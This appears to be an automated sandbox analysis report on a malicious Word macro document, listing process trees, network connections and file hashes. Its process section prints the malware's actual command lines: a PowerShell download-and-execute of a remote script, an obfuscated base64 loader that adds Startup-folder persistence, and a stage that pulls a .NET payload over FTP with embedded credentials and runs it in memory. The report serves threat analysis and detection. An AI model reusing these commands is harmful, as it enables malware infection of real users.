| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Flytour.docm" /o ""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/rgZiV9iE/8r-wKti0.d13d81b1839707719820361a64160ba8 -o test.js; explorer.exe test.js
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" test.js
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $vCHvw = 'J⅕BS⅕H⅕⅕RwBK⅕GI⅕I⅕⅕9⅕C⅕⅕J⅕Bo⅕G8⅕cwB0⅕C4⅕VgBl⅕HI⅕cwBp⅕G8⅕bg⅕u⅕E0⅕YQBq⅕G8⅕cg⅕u⅕EU⅕cQB1⅕GE⅕b⅕Bz⅕Cg⅕Mg⅕p⅕Ds⅕SQBm⅕C⅕⅕K⅕⅕k⅕FI⅕c⅕BH⅕Eo⅕Yg⅕p⅕C⅕⅕ew⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕SQBP⅕C4⅕U⅕Bh⅕HQ⅕a⅕Bd⅕Do⅕OgBH⅕GU⅕d⅕BU⅕GU⅕bQBw⅕F⅕⅕YQB0⅕Gg⅕K⅕⅕p⅕Ds⅕Z⅕Bl⅕Gw⅕I⅕⅕o⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕Ow⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕n⅕Gg⅕d⅕B0⅕H⅕⅕cw⅕6⅕C8⅕LwBk⅕HI⅕aQB2⅕GU⅕LgBn⅕G8⅕bwBn⅕Gw⅕ZQ⅕u⅕GM⅕bwBt⅕C8⅕dQBj⅕D8⅕ZQB4⅕H⅕⅕bwBy⅕HQ⅕PQBk⅕G8⅕dwBu⅕Gw⅕bwBh⅕GQ⅕JgBp⅕GQ⅕PQ⅕n⅕Ds⅕J⅕BI⅕FQ⅕WQBm⅕HY⅕I⅕⅕9⅕C⅕⅕J⅕Bl⅕G4⅕dg⅕6⅕F⅕⅕UgBP⅕EM⅕RQBT⅕FM⅕TwBS⅕F8⅕QQBS⅕EM⅕S⅕BJ⅕FQ⅕RQBD⅕FQ⅕VQBS⅕EU⅕LgBD⅕G8⅕bgB0⅕GE⅕aQBu⅕HM⅕K⅕⅕n⅕DY⅕N⅕⅕n⅕Ck⅕OwBp⅕GY⅕I⅕⅕o⅕CQ⅕S⅕BU⅕Fk⅕ZgB2⅕Ck⅕I⅕B7⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕PQ⅕g⅕Cg⅕J⅕Bo⅕FM⅕QQBI⅕H⅕⅕I⅕⅕r⅕C⅕⅕JwBX⅕DE⅕MQ⅕y⅕EE⅕Z⅕BQ⅕GY⅕SQ⅕w⅕F⅕⅕Qw⅕3⅕Gg⅕YgBz⅕GM⅕aQBf⅕DU⅕Xw⅕w⅕F8⅕ZQBV⅕Dc⅕TgB3⅕E0⅕WgBo⅕GY⅕N⅕B4⅕Cc⅕KQ⅕g⅕Ds⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ew⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕o⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕Kw⅕g⅕Cc⅕MQBi⅕HI⅕ag⅕1⅕Go⅕cQBu⅕HE⅕UgB4⅕EM⅕R⅕⅕2⅕FY⅕a⅕Bm⅕Gg⅕QQBu⅕DI⅕cgBj⅕FY⅕ZgBz⅕FI⅕bw⅕3⅕EQ⅕O⅕Bn⅕HI⅕Jw⅕p⅕C⅕⅕OwB9⅕Ds⅕J⅕Bm⅕Hc⅕UwBZ⅕H⅕⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BG⅕Gk⅕b⅕Bl⅕Cg⅕J⅕BV⅕FI⅕T⅕BL⅕EI⅕L⅕⅕g⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕I⅕⅕7⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕PQ⅕g⅕Cg⅕JwBD⅕Do⅕X⅕BV⅕HM⅕ZQBy⅕HM⅕X⅕⅕n⅕C⅕⅕Kw⅕g⅕Fs⅕RQBu⅕HY⅕aQBy⅕G8⅕bgBt⅕GU⅕bgB0⅕F0⅕Og⅕6⅕FU⅕cwBl⅕HI⅕TgBh⅕G0⅕ZQ⅕g⅕Ck⅕Ow⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕9⅕C⅕⅕K⅕⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕Cs⅕I⅕⅕n⅕Fw⅕VQBw⅕Hc⅕aQBu⅕C4⅕bQBz⅕HU⅕Jw⅕p⅕Ds⅕I⅕Bw⅕G8⅕dwBl⅕HI⅕cwBo⅕GU⅕b⅕Bs⅕C4⅕ZQB4⅕GU⅕I⅕B3⅕HU⅕cwBh⅕C4⅕ZQB4⅕GU⅕I⅕⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕v⅕HE⅕dQBp⅕GU⅕d⅕⅕g⅕C8⅕bgBv⅕HI⅕ZQBz⅕HQ⅕YQBy⅕HQ⅕I⅕⅕7⅕C⅕⅕QwBv⅕H⅕⅕eQ⅕t⅕Ek⅕d⅕Bl⅕G0⅕I⅕⅕n⅕CU⅕R⅕BD⅕F⅕⅕SgBV⅕CU⅕Jw⅕g⅕C0⅕R⅕Bl⅕HM⅕d⅕Bp⅕G4⅕YQB0⅕Gk⅕bwBu⅕C⅕⅕K⅕⅕g⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BB⅕H⅕⅕c⅕BE⅕GE⅕d⅕Bh⅕Fw⅕UgBv⅕GE⅕bQBp⅕G4⅕ZwBc⅕E0⅕aQBj⅕HI⅕bwBz⅕G8⅕ZgB0⅕Fw⅕VwBp⅕G4⅕Z⅕Bv⅕Hc⅕cwBc⅕FM⅕d⅕Bh⅕HI⅕d⅕⅕g⅕E0⅕ZQBu⅕HU⅕X⅕BQ⅕HI⅕bwBn⅕HI⅕YQBt⅕HM⅕X⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕Cc⅕I⅕⅕p⅕C⅕⅕LQBm⅕G8⅕cgBj⅕GU⅕I⅕⅕7⅕H⅕⅕bwB3⅕GU⅕cgBz⅕Gg⅕ZQBs⅕Gw⅕LgBl⅕Hg⅕ZQ⅕g⅕C0⅕YwBv⅕G0⅕bQBh⅕G4⅕Z⅕⅕g⅕Cc⅕cwBs⅕GU⅕ZQBw⅕C⅕⅕MQ⅕4⅕D⅕⅕Jw⅕7⅕C⅕⅕cwBo⅕HU⅕d⅕Bk⅕G8⅕dwBu⅕C4⅕ZQB4⅕GU⅕I⅕⅕v⅕HI⅕I⅕⅕v⅕HQ⅕I⅕⅕w⅕C⅕⅕LwBm⅕C⅕⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ewBb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBT⅕GU⅕cgB2⅕Gk⅕YwBl⅕F⅕⅕bwBp⅕G4⅕d⅕BN⅕GE⅕bgBh⅕Gc⅕ZQBy⅕F0⅕Og⅕6⅕FM⅕ZQBy⅕HY⅕ZQBy⅕EM⅕ZQBy⅕HQ⅕aQBm⅕Gk⅕YwBh⅕HQ⅕ZQBW⅕GE⅕b⅕Bp⅕GQ⅕YQB0⅕Gk⅕bwBu⅕EM⅕YQBs⅕Gw⅕YgBh⅕GM⅕aw⅕g⅕D0⅕I⅕B7⅕CQ⅕d⅕By⅕HU⅕ZQB9⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕E4⅕ZQB0⅕C4⅕UwBl⅕HI⅕dgBp⅕GM⅕ZQBQ⅕G8⅕aQBu⅕HQ⅕TQBh⅕G4⅕YQBn⅕GU⅕cgBd⅕Do⅕OgBT⅕GU⅕YwB1⅕HI⅕aQB0⅕Hk⅕U⅕By⅕G8⅕d⅕Bv⅕GM⅕bwBs⅕C⅕⅕PQ⅕g⅕Fs⅕UwB5⅕HM⅕d⅕Bl⅕G0⅕LgBO⅕GU⅕d⅕⅕u⅕FM⅕ZQBj⅕HU⅕cgBp⅕HQ⅕eQBQ⅕HI⅕bwB0⅕G8⅕YwBv⅕Gw⅕V⅕B5⅕H⅕⅕ZQBd⅕Do⅕OgBU⅕Gw⅕cw⅕x⅕DI⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕g⅕D0⅕I⅕⅕o⅕E4⅕ZQB3⅕C0⅕TwBi⅕Go⅕ZQBj⅕HQ⅕I⅕BO⅕GU⅕d⅕⅕u⅕Fc⅕ZQBi⅕EM⅕b⅕Bp⅕GU⅕bgB0⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBD⅕HI⅕ZQBk⅕GU⅕bgB0⅕Gk⅕YQBs⅕HM⅕I⅕⅕9⅕C⅕⅕bgBl⅕Hc⅕LQBv⅕GI⅕agBl⅕GM⅕d⅕⅕g⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBO⅕GU⅕d⅕B3⅕G8⅕cgBr⅕EM⅕cgBl⅕GQ⅕ZQBu⅕HQ⅕aQBh⅕Gw⅕K⅕⅕n⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕MQ⅕n⅕Cw⅕JwBk⅕GU⅕dgBl⅕Gw⅕bwBw⅕GU⅕cgBw⅕HI⅕bw⅕y⅕DE⅕NQ⅕3⅕Dg⅕SgBw⅕E⅕⅕Q⅕⅕n⅕Ck⅕Ow⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕D0⅕I⅕⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BT⅕HQ⅕cgBp⅕G4⅕Zw⅕o⅕C⅕⅕JwBm⅕HQ⅕c⅕⅕6⅕C8⅕LwBk⅕GU⅕cwBj⅕Gs⅕dgBi⅕HI⅕YQB0⅕DE⅕Q⅕Bm⅕HQ⅕c⅕⅕u⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕LgBj⅕G8⅕bQ⅕u⅕GI⅕cg⅕v⅕FU⅕c⅕Bj⅕HI⅕eQBw⅕HQ⅕ZQBy⅕C8⅕M⅕⅕y⅕C8⅕R⅕BM⅕Ew⅕M⅕⅕x⅕C4⅕d⅕B4⅕HQ⅕Jw⅕g⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕GQ⅕aQBz⅕H⅕⅕bwBz⅕GU⅕K⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕I⅕⅕9⅕C⅕⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕FQ⅕ZQB4⅕HQ⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕XQ⅕6⅕Do⅕VQBU⅕EY⅕O⅕⅕7⅕CQ⅕TQBX⅕GY⅕dQBh⅕C⅕⅕PQ⅕g⅕CQ⅕dwBW⅕F⅕⅕b⅕B1⅕C4⅕R⅕Bv⅕Hc⅕bgBs⅕G8⅕YQBk⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕Ck⅕OwBb⅕EI⅕eQB0⅕GU⅕WwBd⅕F0⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕QwBv⅕G4⅕dgBl⅕HI⅕d⅕Bd⅕Do⅕OgBG⅕HI⅕bwBt⅕EI⅕YQBz⅕GU⅕Ng⅕0⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕u⅕FI⅕ZQBw⅕Gw⅕YQBj⅕GU⅕K⅕⅕g⅕Cc⅕kyE6⅕JMhJw⅕g⅕Cw⅕I⅕⅕n⅕EE⅕Jw⅕g⅕Ck⅕I⅕⅕p⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕EE⅕c⅕Bw⅕EQ⅕bwBt⅕GE⅕aQBu⅕F0⅕Og⅕6⅕EM⅕dQBy⅕HI⅕ZQBu⅕HQ⅕R⅕Bv⅕G0⅕YQBp⅕G4⅕LgBM⅕G8⅕YQBk⅕Cg⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕Ck⅕LgBH⅕GU⅕d⅕BU⅕Hk⅕c⅕Bl⅕Cg⅕I⅕⅕n⅕EM⅕b⅕Bh⅕HM⅕cwBM⅕Gk⅕YgBy⅕GE⅕cgB5⅕DM⅕LgBD⅕Gw⅕YQBz⅕HM⅕MQ⅕n⅕C⅕⅕KQ⅕u⅕Ec⅕ZQB0⅕E0⅕ZQB0⅕Gg⅕bwBk⅕Cg⅕I⅕⅕n⅕H⅕⅕cgBG⅕FY⅕SQ⅕n⅕C⅕⅕KQ⅕u⅕Ek⅕bgB2⅕G8⅕awBl⅕Cg⅕J⅕Bu⅕HU⅕b⅕Bs⅕Cw⅕I⅕Bb⅕G8⅕YgBq⅕GU⅕YwB0⅕Fs⅕XQBd⅕C⅕⅕K⅕⅕g⅕Cc⅕Mg⅕y⅕CU⅕OQ⅕3⅕D⅕⅕MwBj⅕GY⅕N⅕⅕0⅕GI⅕Z⅕⅕z⅕DU⅕YQ⅕1⅕GM⅕N⅕⅕3⅕DQ⅕Ng⅕y⅕GI⅕NwBi⅕GU⅕O⅕⅕y⅕Dk⅕O⅕⅕x⅕DI⅕Zg⅕2⅕DI⅕Mg⅕l⅕D0⅕dg⅕m⅕GQ⅕YQBv⅕Gw⅕bgB3⅕G8⅕Z⅕⅕9⅕GU⅕YwBy⅕HU⅕bwBz⅕CY⅕d⅕B4⅕HQ⅕Lg⅕0⅕DI⅕M⅕⅕y⅕C4⅕Nw⅕w⅕C4⅕M⅕⅕z⅕Dc⅕Mg⅕l⅕Dc⅕Mg⅕l⅕Dg⅕LQBG⅕FQ⅕VQBE⅕DM⅕JQBB⅕DI⅕JQBl⅕G0⅕YQBu⅕GU⅕b⅕Bp⅕GY⅕KwBC⅕DM⅕JQ⅕y⅕DI⅕JQB0⅕Hg⅕d⅕⅕u⅕DQ⅕Mg⅕w⅕DI⅕Lg⅕3⅕D⅕⅕Lg⅕w⅕DM⅕Mg⅕y⅕CU⅕R⅕⅕z⅕CU⅕ZQBt⅕GE⅕bgBl⅕Gw⅕aQBm⅕Cs⅕Qg⅕z⅕CU⅕d⅕Bu⅕GU⅕bQBo⅕GM⅕YQB0⅕HQ⅕YQ⅕9⅕G4⅕bwBp⅕HQ⅕aQBz⅕G8⅕c⅕Bz⅕Gk⅕Z⅕⅕t⅕HQ⅕bgBl⅕HQ⅕bgBv⅕GM⅕LQBl⅕HM⅕bgBv⅕H⅕⅕cwBl⅕HI⅕PwB0⅕Hg⅕d⅕⅕u⅕GU⅕N⅕⅕1⅕DM⅕N⅕⅕y⅕DQ⅕Mg⅕3⅕Dk⅕O⅕⅕1⅕C0⅕NQBl⅕Dc⅕OQ⅕t⅕GY⅕Yw⅕2⅕DQ⅕LQ⅕0⅕DU⅕N⅕⅕4⅕C0⅕M⅕⅕5⅕Dc⅕ZgBh⅕D⅕⅕NQ⅕1⅕C8⅕bwBR⅕E8⅕MgBM⅕HU⅕M⅕Bv⅕C8⅕cwBt⅕GU⅕d⅕Bp⅕C8⅕bQBv⅕GM⅕LgB0⅕Gg⅕ZwBp⅕Ho⅕LgBu⅕GQ⅕Yw⅕u⅕D⅕⅕bg⅕u⅕DE⅕cgB0⅕C4⅕NwBw⅕C8⅕Lw⅕6⅕HM⅕c⅕B0⅕HQ⅕a⅕⅕n⅕C⅕⅕L⅕⅕g⅕Cc⅕JQBE⅕EM⅕U⅕BK⅕FU⅕JQ⅕n⅕Cw⅕I⅕⅕n⅕FQ⅕cgB1⅕GU⅕MQ⅕n⅕C⅕⅕KQ⅕g⅕Ck⅕OwB9⅕Ds⅕';$vCHvw = $vCHvw.replace('⅕','A') ;$vCHvw = [System.Convert]::FromBase64String( $vCHvw ) ;;;$vCHvw = [System.Text.Encoding]::Unicode.GetString( $vCHvw ) ;$vCHvw = $vCHvw.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js') ;powershell $vCHvw
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$RpGJb = $host.Version.Major.Equals(2);If ($RpGJb) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$hSAHp = 'https://drive.google.com/uc?export=download&id=';$HTYfv = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ($HTYfv) {$hSAHp = ($hSAHp + 'W112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$hSAHp = ($hSAHp + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$fwSYp = (New-Object Net.WebClient) ;$fwSYp.Encoding = [System.Text.Encoding]::UTF8 ;$fwSYp.DownloadFile($URLKB, $pasta + '\Upwin.msu') ;$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.js' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$wVPlu.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$MWfua = $wVPlu.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$wVPlu.dispose();$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$MWfua = $wVPlu.DownloadString( $MWfua );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $MWfua.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '22%9703cf44bd35a5c47462b7be829812f622%=v&daolnwod=ecruos&txt.4202.70.0372%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.70.0322%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.e45342427985-5e79-fc64-4548-097fa055/oQO2Lu0o/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'True1' ) );};"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft SyS\\x2.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft SyS\isltf.ps1"
C:\Windows\system32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 18.89.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 199.101.134.238:443 | www.4sync.com | tcp |
| US | 8.8.8.8:53 | dc545.4sync.com | udp |
| US | 204.155.149.26:443 | dc545.4sync.com | tcp |
| US | 8.8.8.8:53 | 238.134.101.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.149.155.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.desckvbrat.com.br | udp |
| BR | 191.252.83.213:21 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | 213.83.252.191.in-addr.arpa | udp |
| BR | 191.252.83.213:60398 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 172.67.187.200:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | 200.187.67.172.in-addr.arpa | udp |
| BR | 191.252.83.213:60383 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | p7.tr1.n0.cdn.zight.com | udp |
| GB | 13.224.132.126:443 | p7.tr1.n0.cdn.zight.com | tcp |
| BR | 191.252.83.213:60340 | ftp.desckvbrat.com.br | tcp |
| US | 8.8.8.8:53 | 126.132.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | marcelotatuape.ddns.net | udp |
| BR | 177.52.84.20:333 | marcelotatuape.ddns.net | tcp |
| BR | 177.52.84.20:333 | marcelotatuape.ddns.net | tcp |
Files
memory/2524-0-0x00007FF822310000-0x00007FF822320000-memory.dmp
memory/2524-1-0x00007FF822310000-0x00007FF822320000-memory.dmp
memory/2524-2-0x00007FF822310000-0x00007FF822320000-memory.dmp
memory/2524-3-0x00007FF822310000-0x00007FF822320000-memory.dmp
memory/2524-4-0x00007FF86232D000-0x00007FF86232E000-memory.dmp
memory/2524-5-0x00007FF822310000-0x00007FF822320000-memory.dmp
memory/2524-8-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-9-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-10-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-7-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-6-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-12-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-14-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-15-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-19-0x00007FF820040000-0x00007FF820050000-memory.dmp
memory/2524-18-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-17-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-16-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-13-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-11-0x00007FF820040000-0x00007FF820050000-memory.dmp
memory/2524-34-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-37-0x00007FF862290000-0x00007FF862485000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | de36db977ed6368d6c2c772d2150d1eb |
| SHA1 | b6cd0ca1d70097fe2b4a0ceff30d0626f3a64e29 |
| SHA256 | bd1e89e16a174c41aa3f8152602a79a5edc067587175bd6e93c1a916604a03a2 |
| SHA512 | fb8b623164930ed143ca51cf79283765a919f7b23475825465f3291f0914d552d97024c93dfdd2b3113e079d083807e6e1ac0f6d90d2264f376da7d69781c7a9 |
memory/2524-46-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-47-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/2524-59-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/4196-60-0x00007FF862290000-0x00007FF862485000-memory.dmp
memory/4196-61-0x000001F35DB30000-0x000001F35DB52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ezn31qn5.jxj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4196-74-0x00007FF862290000-0x00007FF862485000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\test.js
| MD5 | 4e37cf7563ad5ebcde8bfcb51a515c48 |
| SHA1 | b9f758dd64b60da7da2f01b680d45abaf854f41e |
| SHA256 | f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331 |
| SHA512 | 9f63413b1759b8c467a7aa146a12f709ce5a929a928f70ea00799b6246eab3d04afea884d78a87e23ab4cb5fcb8b51269d2a5221b0bb93f9cca7c3468d2359fe |
